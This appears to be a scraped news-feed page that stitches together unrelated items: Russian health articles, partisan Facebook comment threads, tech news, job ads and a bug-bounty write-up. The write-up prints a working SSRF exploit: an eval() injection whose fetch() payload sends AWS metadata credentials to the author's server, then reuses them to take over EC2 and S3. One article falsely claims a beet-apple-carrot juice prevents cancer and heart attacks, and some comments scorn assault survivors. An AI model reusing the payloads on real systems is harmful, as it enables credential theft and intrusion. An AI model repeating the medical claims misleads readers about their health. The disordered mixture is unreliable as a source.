В этой статье мы собираемся представить вам 10 удивительных преимуществ и способов использования миндаля.

1. Миндаль содержит много клетчатки и других питательных веществ:
Миндаль очень богат клетчаткой и других основных питательных веществ, таких как белок, магний, калий и т. д. Миндаль в основном является орехом дерева, и он содержит больше клетчатки и белка, чем любой другой орех. Если человек регулярно съедает от 10 до 15 миндалей в день, то он может восполнить недостаток таких питательных веществ.

2. Миндаль является богатым источником антиоксидантов:
Миндаль имеет большое количество антиоксидантов, обязательных для организма человека. Антиоксидант укрепляет вашу иммунную систему и выводит все токсины из вашего тела. И вам будет интересно узнать, что верхний коричневый слой миндаля содержит большое количество антиоксидантов, поэтому, если это возможно, тогда ешьте миндаль с коричневой кожей. Правильное количество миндаля в один день наполнит вас необходимыми компонентами и поможет уменьшить стресс.

3. Миндаль богат витамином Е:
Витамин E – полезный компонент для вашего тела, волос и кожи. Согласно оценке, миндаль является одним из самых богатых орехов, который содержит большое количество витамина Е. Регулярное употребление миндаля может оказать огромное влияние на ваше здоровье, которое включает в себя здоровье сердца, уровень сахара в крови, здоровую кожу и волосы, а также слабое зрение.

4. Миндаль помогает контролировать уровень сахара:
Если у вас диабет, то вы должны есть миндаль на пустой желудок. Он содержит большое количество магния, что повышает уровень метаболизма организма и улучшает инсулиновую систему вашего организма.

5. Миндаль эффективен для кровяного давления и холестерина:
Еще раз магний полезен для контроля уровня кровяного давления и уровня холестерола тела. Низкий уровень магния был ответственен за увеличенного кровяного давления и плохого холестерина, но миндаль имеет необходимое количество магния, поэтому 12-15 штук в дне может дать много здоровых и положительных изменений в вашем теле.

6. Миндаль полезен при похудении:
Миндаль богат белком и низким содержанием углеводов, поэтому, если вы ищете для снижения веса, то миндаль может помочь вам. Соотвествующее количество протеина и волокна делает вас чувствовать сытость и вы не будете чувствовать голод снова и снова.

7. Миндаль – волшебный орех во время беременности:
Если вы беременны и хотите иметь здорового и умного ребенка, то начните есть миндаль. Миндаль имеет все виды преимуществ, доступных как для малыша, так и для матери. Здоровые питательные вещества и витамин миндаля дают достаточные минералы и компоненты. Вы можете есть пропитанный миндаль или миндальный коктейль с медом и молоком.

8. Миндаль стимулирует работу мозга:
Опять же, помните совет вашей матери или бабушки, что нужно есть миндаль, чтобы быть мудрым. 8-10 штук вымоченного миндаля в день помогает стимулировать работу головного мозга и системы нервов. Так что если вы растущий ребенок, то необходимо начать есть миндаль на регулярной основе.

9. Миндаль полезен для здоровья сердца:
Миндаль обладает такой способностью: он может обеспечить вам здоровое сердце. Он содержит калий и магний, которые помогают снизить уровень холестерина ЛПНП, а также контролирует уровень сахара в крови.

10. Миндаль отлично подходит для уменьшения запоров:
Продукты, которые богаты в волокне, могут разрешить проблему запора. Если у вас хронический запор, то включайте миндаль в ваш регулярный рацион. Миндаль содержит богатое количество клетчатки, что важно для улучшения пищеварительной системы. Молотый миндаль полезен для лечения запоров. Было бы хорошо, если вы не будете использовать сушеный миндаль.

Источник
Перевод и адаптация — Фитхакер

Загрузка...

Let's block ads! (Why?)


          Чудесный напиток: свекла, яблоко и морковь устраняют раковые клетки      Cache   Translate Page      

Сегодня в этой статье мы представляем вам чудесный напиток. Он состоит из моркови, свеклы и яблока. Все эти ингредиенты очень мощные и могут помочь вам в управлении и профилактике многих видов заболеваний.

Давайте узнаем некоторые преимущества для здоровья, которые вы можете получить, употребляя этот чудодейственный напиток.

Преимущества употребления этого чудесного напитка:
1. Этот напиток предотвратит развитие любого типа раковых клеток в вашем организме.

2. Этот чудо-напиток может предотвратить заболевания печени, почек, поджелудочной железы, и он может быть использован для лечения язвы.

3. Хорошие новости для пациентов с высоким кровяным давлением и проблемами легких. Этот напиток может помочь в управлении высоким кровяным давлением, а также может укрепить легкие и предотвратить сердечный приступ.

4. Употребление этого напитка улучшит общее состояние иммунной системы.

5. Этот напиток улучшит ваше зрение. Если вы можете потреблять этот напиток регулярно, он может помочь вам в устранении красноты глаз и сухости глаз.

6. Это может помочь вам в облегчении боли в мышцах. Если вы посещаете тренажерный зал, этот напиток может быть хорошим вариантом, чтобы быть выбранным в качестве обезболивающего.

7. Этот волшебный напиток выводит токсины из организма. Также он помогает в дефекации и предотвращает запор.

8. Этот напиток также улучшает пищеварение, предотвращает неприятный запах изо рта и предотвращает любую инфекцию горла.

9. Он уменьшает менструальную боль в значительной степени.

10. Этот напиток может предотвратить приступ сенной лихорадки.

Необходимые ингредиенты:
одно яблоко
одна свекла
одна морковка.

Простые шаги для приготовления:
1. Возьмите яблоко, свеклу и морковь и очистите их.

2. После этого, разрежьте их на более мелкие кусочки, чтобы их легко можно было раздавить, а затем извлечь из них соки.

3. Теперь один за другим начинайте класть кусочки моркови, свеклы и яблока в смесь и извлекать их соки в миску.

4. Вы можете добавить лимон или лайм, чтобы добавить освежающий вкус.

5. Теперь выпейте это немедленно для самых лучших и немедленных результатов.

Как употреблять:
Употреблять этот напиток следует за полчаса до вкусного завтрака.
Вы можете также употреблять его дважды день, раз утром и раз вечеро для немедленных и более быстрых результатов.
Через две недели применения, вы заметите множество изменений в своем здоровье.

Источник
Перевод и адаптация — Фитхакер
Фото — edinstvennaya.ua

Загрузка...

Let's block ads! (Why?)


          5 предостерегающих симптомов деменции      Cache   Translate Page      

«Могу ли я точно вспомнить, когда я «потеряла» мужа? Это был момент, когда мне пришлось завязать ему шнурки? Или когда мы перестали смеяться друг над другом? Оглядываясь назад, этот поворотный момент невозможно точно определить. Такова природа слабоумия». — Джуди Парфитт, английская актриса

Как и большинство заболеваний, которые серьезно влияют на когнитивное функционирование, деменция является трагическим, мучительным состоянием. В этой статье мы обсудим, что такое деменция, некоторые предупреждающие признаки заболевания и методы лечения.

Что такое слабоумие?
В организации Альцгеймера деменция является «общим термином для описания снижения умственных способностей, достаточно серьезных, чтобы вмешиваться в повседневную жизнь». Потеря памяти и болезнь Альцгеймера – наиболее распространенная форма деменции. Деменция, как правило, постепенное снижение памяти, мышления и рассуждения.

Виды деменции
Как уже упоминалось, болезнь Альцгеймера – наиболее распространенная форма деменции, что составляет от 60 до 80 процентов всех случаев. Болезнь Альцгеймера является фатальным заболеванием, которое нейтрализует клетки мозга и когнитивные функции.

Второй ведущей причиной деменции называется сосудистая деменция – форма деменции после инсульта.

Клиника Майо характеризует инсульт следующим образом:
«Инсульт возникает, когда кровоснабжение мозга прерывается или сокращается. Это лишает ваш мозг кислорода и питательных веществ, которые могут привести к смерти ваших клеток мозга. Инсульт может быть вызван закупоркой артерии (ишемический инсульт) или утечкой или разрывом кровеносного сосуда (геморрагический инсульт).

Что не является слабоумием
Как уже упоминалось, деменция является сложным заболеванием; тем не менее, невежество привело людей к мысли, что это строго возрастная проблема – это не так.

Деменция часто неправильно упоминается как «старческое» слабоумие, что отражает ранее широко распространенное, но неправильное убеждение в том, что серьезное умственное расстройство является нормальной частью старения. Изменения в памяти часто (не всегда) происходят по мере старения.

Основное различие между любыми «возрастными» проблемами с памятью и деменцией заключается в степени влияния на повседневную жизнь. Каждый человек в какой-то момент что-то забывает или испытывает острые приступы «мозгового тумана». Многие люди имеют проблемы с памятью и проблемы с мышлением, но это не значит, что у них есть слабоумие.

Учитывая сложность рассматриваемой темы, мы советуем всем, кто испытывает или знает кого-то с когнитивными проблемами, обратиться за медицинской помощью.

Вот 5 признаков слабоумия:

1. Сложность планирования или решения проблем
Некоторые люди с деменцией испытывают внезапные изменения в их способности разрабатывать и следовать плану. Простые задачи, такие как отслеживание банковских остатков или следование рецепту, например, становятся намного сложнее.

2. Проблемы с некогда знакомыми задачами
Одним из наиболее заметных признаков деменции является снижение способности выполнять рутинные задачи. Возможно, человек не в состоянии сориентироваться по знакомому маршруту или забывает о том, как играть в любимую игру. Как правило, выполнение чего-то привычного – это глубоко укоренившаяся нейронная деятельность, которую можно завершить “не задумываясь». Любые заметные изменения в чьей-либо способности выполнять общие задачи требуют внимания.

3. Новые проблемы при общении
Люди с деменцией часто имеют проблемы при разговорах. Они могут перестать взаимодействовать, забыть о чем-то, что они сказали (возможно, повторить себя), или понятия не имеют, как действовать. Словарные проблемы также распространены, например, неспособность найти правильное слово.

4. Выход из социальной или трудовой деятельности
Когда человек начинает испытывать когнитивные проблемы, которые приносит деменция, они могут устранить себя от работы или социальной деятельности. Часть этого отказа может быть связана с личностными изменениями, страхом или отрицанием. Независимо от причины, некоторые страдающие деменцией становятся все более отдаленными.

5. Потеря памяти в ежедневной жизни
Опять же, ключевая фраза «для повседневной жизни». Провалы в памяти случаются со всеми нами, но редко – если вообще когда-либо – такие провалы значительно затрудняют наш день. На ранних стадиях деменции, забывание недавней информации является одним из наиболее универсальных признаков основного заболевания.

Другие заметные признаки серьезных проблем с памятью :
— забываете важные даты или события
— неоднократно запрашиваете ту же информацию, что и ранее
— растущая зависимость от других, чтобы что-то запомнить

Вывод

Организация Альцгеймера предоставляет шесть ключевых рекомендаций по профилактике деменции:
— бросайте курить
— держите ваше кровяное давление, холестерол, и сахар в крови под контролем
– ешьте здоровую, сбалансированную пищу
– упражнения
— поддерживайте здоровый вес
— ограничьте употребление алкоголя.

Источник
Перевод и адаптация — Фитхакер
Фото — mguu.ru

Загрузка...

Let's block ads! (Why?)


          Fake News      Cache   Translate Page      
--------

Ron Cutrera shared a video.- October 6 at 1:37 PM
-------
https://www.youtube.com/watch?v=3KMfETp5w3w

Definitive Proof That Kavanaugh Lied
Definitive Proof That Kavanaugh Lied
FACEBOOK WATCh
503,364 Views
The Young Turks — with Tom Morello.
Brett Kavanaugh was caught lying multiple times during yesterday's hearing. Get exclusive access to our best content. http://tyt.com/GETACCESS
--------
Comments
Lenda Yu Brewer fake responses by Kavanaugh, taken from the committee hearing.
Manage
--------
Lenda Yu Brewer he is actually quoted on his views of polygraph credibility yet now says he doesn't believe they are ....in his case. mmm. straight from the hearing responses this news outlet covers.
Manage
Image may contain: text
---------
Lenda Yu Brewer During the five days of the farce, we kept hearing from people desperate to speak to the FBI, including Ford. She was never interviewed. Neither was Kavanaugh. Neither were the scores of potential witnesses who tried to offer a clearer picture of what might have happened.
https://www.cnn.com/.../kavanaugh-fbi-probe.../index.html
Manage
--------
Thomas Williams \

We are walking on the razor's edge of becoming a failed country that was once very strong socially but has descended into the Ivy League fanatical minded culture that creating this divided union of no return. Instead of a perfect American union drea
m of our country's forefathers.

I always thought that women don't like weakness in a man or woman but to that contrary, all I am seeing are groups of woman wallowing in the weakness of rehashing a bad sexually experience from sometime in their life. So who has not had a bad sexual experience of some kind and why is that memory becoming the most important bad feeling in the life they are living today?

Frankly, I still don't like weakness in men or woman from the past or present, you know what mean.
Manage
---------
About this website
100PERCENTFEDUP.COM
CNN’s Brooke Baldwin had a hard time digesting the truth when she had Matt Lewis, columnist for The Daily Beast, on her show. They were discussing the Democrats and the leftist way to fight against things they don’t like, such as the Supreme Court confirmation of Judge Brett Kavanaugh, and that....

-------
          And may all of their own mortal cold-hearted souls rot in hell.      Cache   Translate Page      
--------
Thomas Williams and Bill Gordon shared a link.
CALIFORNIAFAMILY.ORG
Planned Parenthood has killed over 7.6 million babies since it legally began performing abortions in 1973 following the Roe v. Wade decision. That’s a catastrophic number. It’s easy to …
  • All those horrible evil people who did that are all very freaky creeps to me. And may all of their own mortal cold-hearted souls rot in hell.
--------
          Our Lord God is truly a good person.       Cache   Translate Page      
--------
Prince Onyeka Chiukwu Abiama
September 25 at 8:20 AM
CNN or BBC will not show you this one...they will only be showing you every negative thing about Donald Trump...just watch how Trump receives prayer every morning...God bless J Trump
--------
https://www.youtube.com/watch?v=a0_mCivoTSs

Faith leaders put hands on Trump and pray
--------
Thomas Williams - Our Lord God is truly a good person. With a divine love that we cannot imagine having the capacity to love everyone both sinner and innocent alike in the same way. How lucky can we be that all we need to do is be worthy?
-------
BUCHANAN.ORG
After a 50-year siege, the great strategic fortress of liberalism has fallen. With the elevation of Judge Brett Kavanaugh, the Supreme Court seems secure for constitutionalism — perhaps for decades.

--------
          Dr. Ford is crackers.      Cache   Translate Page      
--------


Ron Cutrera shared a link.




YOUTUBE.COM
Kavanaugh Accuser’s Husband Breaks His Silence, Exposes ‘Sick Issue’ His Wife Has Over the…

Comments
--------
https://www.youtube.com/watch?v=mHV1DjMCobk&feature=share

 Kavanaugh Accuser’s Husband Breaks His Silence, Exposes ‘Sick Issue’ His Wife Has
--------
          Security takes center stage at Google’s hardware event      Cache   Translate Page      

Yesterday’s big Google news involved the revelation that a software glitch in Google+ had left data from hundreds of thousands users vulnerable. But today, Google is pushing a message of privacy. At its big hardware event in New York, Google executives repeatedly emphasized that security is baked into all of the company’s products.

“The big breakthroughs you’re going to see are not in hardware alone,” said Rick Osterloh, Google’s senior VP of hardware at Google. “By combining Titan Security both in the data center and on devices, we’ve created a closed loop for your data across the Google ecosystem.” He then promised that there would be more talk of security efforts throughout the program.

Google Titan first emerged roughly a year ago as a homegrown chip to secure Google’s cloud. It debuted at the 2017 Cloud Next event in San Francisco as a meaty promise to protect enterprise client data. The chip allows Google to prevent unauthorized access at the processor level, and it also scans hardware for tampering. “It allows us to maintain a level of understanding in our supply chain that we otherwise wouldn’t have,” Neal Mueller, Google’s cloud marketing head, told Reuters last year.

Titan takes on new relevance both in light of the Google+ vulnerability, but also Bloomberg’s report that hackers are infiltrating big tech companies at the chip level. (Apple, Amazon, and the U.S. government have denied the substance of Bloomberg’s reporting, but the risk is real.)

While Google’s secure chips may have started in the cloud, they’re now embedded in the new gadgets the company announced today: the Pixel 3 smartphone, Pixel Slate tablet, and Google Home Hub smart display/smart-home controller. Of course, security has been a component of such devices before, but Google doesn’t often call it out so bluntly.

“We specifically did not put a camera on Home Hub,” said Diya Jolly, Google’s VP for product management, as she revealed the new device, which is a digital picture frame that can also read back calendar events, weather, and traffic reports (of course, it does search, too). Jolly said that Google recognized that people may not want cameras in the most private areas of their home, like a bedroom. But it was a strange call-out, since Google already puts cameras in your home through the Pixel phones and Nest Cam home-security cameras.

That’s why it’s always made sense for Google to stay away from positioning itself as a privacy advocate like Apple does, for instance. Fundamentally, it isn’t one. Regardless of the glossy product updates and push into hardware, Google still makes the vast majority of its money putting ads against gobs of user data. All these other products are essentially ventricles that feed into Google’s great body of user data. It not only sees everything you search for, it wants to handle the lock on your doors, the security cameras on your property, and the temperature of your domicile.

But the company can promise the information you share with it will remain secret—at least between you and Google. In August, Google launched a $50 multi-factor authentication key for consumers, a technology typically reserved for big enterprise and government workers. Even if Google wants to give this level of security to the masses, the problem is that people don’t want to make the effort to secure themselves: In January, at the Usenix Enigma security conference, a Google engineer told attendees that only 10% of Gmail users use two-factor authentication to make life harder for hackers.

The messaging at Google’s hardware event takes a different approach. The company is saying it’s focused on protecting your data—even if you aren’t.


          Dear Lord, How can I die remembering her love while I'm still alive? A fate worse than death.      Cache   Translate Page      
--------
Comments

Thomas Williams Oh! Now I like her music "not so much anymore"😥😥. ... https://www.youtube.com/watch?v=P5NjIt9Fh2s
Manage
---------
Thomas Williams - Oh my God, I'm going to die now. Because she did cry and I was so surprised at how deeply she felt...I can hardly stand remembering that moment now. So I only hope that there a heave for real where we can be that way again, Susan Marie. Forget about Taylor Swift.
--------
https://www.youtube.com/watch?v=V1bFr2SWP1I


OFFICIAL Somewhere over the Rainbow - Israel "IZ" Kamakawiwoʻole
--------
          If Black America wants to really rebuild the inner city of America where they live, vote Republican and watch it happen.      Cache   Translate Page      
-------
Comments
Chad Governale - So is he saying there are more Lynch mobs than regular people for trump to have been elected president? Just wondering
Manage
--------
Ron Cutrera Remember - this guy was one of Obama’s advisors. You are known for
The company you keep.
Manage
--------
Thomas Williams - This guy is still the same bull talking guy using the black American people's fears and social hatreds for his own vanity and political power. Come on black America, "kick this political grifter Al Sharpton aside and out of your hair. "What did he ever do for you except promises something he cannot deliver, Trump deliveries. If Black America wants to really rebuild the inner city of America where they live, vote Republican and watch it happen.
-------
          Episode 322: #NotMyInternet | TechSNAP 322      Cache   Translate Page      
We discuss who really controls the internet & just how centralized and potentially vulnerable it has become. Plus the latest security letdowns from Windows 10, the story of a questionably ethical hacker & Zomato's data breach.

Plus some fantastic feedback, a robust roundup & so much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Episode 307: State Sponsored Audiophiles | TechSNAP 307      Cache   Translate Page      

The details on the latest WordPress vulnerability, then the surprising, or perhaps not so surprising takeover of a cybersecurity firms website & watch out, hacker's may be using your microphone to steal your data!

Plus a packed roundup, your feedback & so much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Episode 238: Certifiable Authority | TechSNAP 238      Cache   Translate Page      

TalkTalk gets compromised, Hackers make cars safer & Google plays hardball with Symantec.

Plus a great batch of your questions, a rocking round up & much, much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Episode 224: Butterflies & Backronyms | TechSNAP 224      Cache   Translate Page      

The Backronym vulnerability hits MySQL right in the SSL protection, we’ll share the details. The hacker Group that hit Apple & Microsoft intensifies their attacks & a survey shows many core Linux tools are at risk.

Plus some great questions, a rockin' roundup & much much more!

#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000
          Commerce Payment Encryption      Cache   Translate Page      

This module protects payment transactions, encrypting them into the database. This module doesn't alter user experience. In case of database hacking, this sensitive data would be useless for the hacker.

Proceed first to a full backup of your database!

The program is provided "as is" without warranty of any kind, either expressed or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose.

The entire risk as to the quality and performance of the program is with you.

What is Commerce Payment Encryption?

Commerce Payment Encryption was design to encrypt the third party callback that contains sensitive data such as country, home address, card type, email, name etc.

Requirements

Encrypt module

Commerce Kickstart Distribution or Commerce module(commerce_payment submodule has to be enabled)


          Kommentarer till Vader Sessions av minecraft free download 2018      Cache   Translate Page      
Howdy! Do you know if they make any plugins to protect against hackers? I'm kinda paranoid about losing everything I've worked hard on. Any tips?
          Seven Ways Hackers Can Steal Your Keyless Car in Seconds      Cache   Translate Page      

Are you in danger of seeing your treasured car being stolen off your driveway, even without criminals having the key? The rise of keyless cars – where instead of the traditional key being inserted, cars are opened with a remote fob and started by button – has triggered a wave of thefts, as criminals trick vehicles into believing the key fob is present. There has been a 19 per cent increase in car crime and a 29 per cent surge in crimes related to vehicle interference since 2014, according to figures from the Office of National Statistics. Price comparison website … Continue reading

The post Seven Ways Hackers Can Steal Your Keyless Car in Seconds appeared first on LewRockwell.


          AWS takeover through SSRF in JavaScript      Cache   Translate Page      

Here is the story of a bug I found in a private bug bounty program on Hackerone . It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

Intro

As I said, the program is private so the company, let’s call it: ArticMonkey.

For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a javascript version, let’s dig in!

The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

helper.prototype.Union = function() { for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22]; var value = args.shift(), symbol = args.shift(), results = args.filter(function(arg) { try { return eval(value + symbol + arg) } catch (e) { return !1 } }); return !!results.length }

Did you notice that? Did you notice that kinky eval() ? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false .

However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' ); Union( '1', '2;alert();', '3' ); Union( '1', '2', '3;alert()' ); ... Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1 Host: api.REDACTED.com Connection: close Content-Length: 232 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (X11; linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red Content-Type: application/json;charset=UTF-8 Referer: https://app.REDACTED.com/REDACTED Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: auth=REDACTED {...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 54 Connection: close X-Content-Type-Options: nosniff X-Xss-Protection: 1 Strict-Transport-Security: max-age=15768000; includeSubDomains ...REDACTED... [{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":null} [] {...REDACTED...,"operation":"0"} [] {...REDACTED...,"operation":"1"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"a"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"a=1"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert()"} {"status":400,"message":"Function 'alert' is not defined"} {...REDACTED...,"operation":"Union()"} []

What I conclued here was:

operation

Let’s continue with Union() :

{...REDACTED...,"operation":"Union(1,2,3)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union(a,b,c)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a','b','c')"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a';'b';'c')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'2';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'<';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'>';'3')"} []]

Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest; x.open( 'GET','https://poc.myserver.com' ); x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' ); i.src = '<img src="https://poc.myserver.com/xxx.png">'; document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">'; document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest; x1.open( 'GET','https://...', false ); x1.send(); r = x1.responseText; x2 = new XMLHttpRequest; x2.open( 'GET','https://poc.myserver.com/?r='+r, false ); x2.send();

Again it toke me while to get the correct syntax with fetch() . Thanks StackOverflow .

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, Origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response ( r parameter) in my Apache log file was empty.

Since I found some S3 buckets related to ArticMonkey ( articmonkey-xxx ), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront ). I quickly jump on the list of the most common SSRF URL for Cloud Instances .

And got a nice hit when I tried to access the metadatas of the instance.
AWS takeover through SSRF in JavaScript

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname iam/ ...

Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE> . Which returned:

{ "Code":"Success", "Type":"AWS-HMAC", "AccessKeyId":"...REDACTED...", "SecretAccessKey":"...REDACTED...", "Token":"...REDACTED...", "Expiration":"2018-09-06T19:24:38Z", "LastUpdated":"2018-09-06T19:09:38Z" } Exploit the credentials

At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management . My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey , this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44... $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI... $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my idendity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…


AWS takeover through SSRF in JavaScript

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt

07/09/2018 00h30 - report

07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

Conclusion

I learnt alot because of this bug:

ReactJS, fetch(), AWS metadatas. RTFM! The official documentation is always a great source of (useful) informations. At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up. I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


          Google takes on the iPad Pro and Surface Pro with the Pixel Slate - Mashable      Cache   Translate Page      

Mashable

Google takes on the iPad Pro and Surface Pro with the Pixel Slate
Mashable
Google really nailed it with the Pixelbook. The laptop-tablet hybrid was a bit steep at $1,000, but boy was it one helluva fun work and play machine. Google's just-announced Pixel Slate is a departure from the Pixelbook and its flippable screen. With ...
Google's Home Hub Is Missing a Camera. Here's Why That's a Smart IdeaTIME
Google Pixel's product directors on single cameras and notchesTechCrunch
The 5 Most Important Announcements from Google's Pixel EventLifehacker
Telegraph.co.uk -The Independent -YouTube
all 3,293 news articles »

          Pentagon slow to protect weapon systems from cyber threats: U.S. agency      Cache   Translate Page      
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.

          New best story on Hacker News: How to Get Things Done When You Don't Feel Like It https://t.co/lowwYFc5W1      Cache   Translate Page      
New best story on Hacker News: How to Get Things Done When You Don't Feel Like It https://t.co/
          Senior Consultant, Red Team - Deloitte - Montréal, QC      Cache   Translate Page      
We’ve already performed hacking for our clients world-wide and in all industry sectors, and we’re now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT - View all Montréal, QC jobs
          Growth Hacker - KLF Group - Montréal, QC      Cache   Translate Page      
Experience with growth hackings tools. We’re looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT - View all Montréal, QC jobs
          Commentaires sur Bonjour tout le monde ! par Security Companies County Durham      Cache   Translate Page      
Howdy! Do you know if they make any plugins to protect against hackers? I'm kinda paranoid about losing everything I've worked hard on. Any recommendations?
          Google Pixel 3XL hands on: A lot of phone, a lot of notch, and a lot of money - Good Gear Guide      Cache   Translate Page      

Good Gear Guide

Google Pixel 3XL hands on: A lot of phone, a lot of notch, and a lot of money
Good Gear Guide
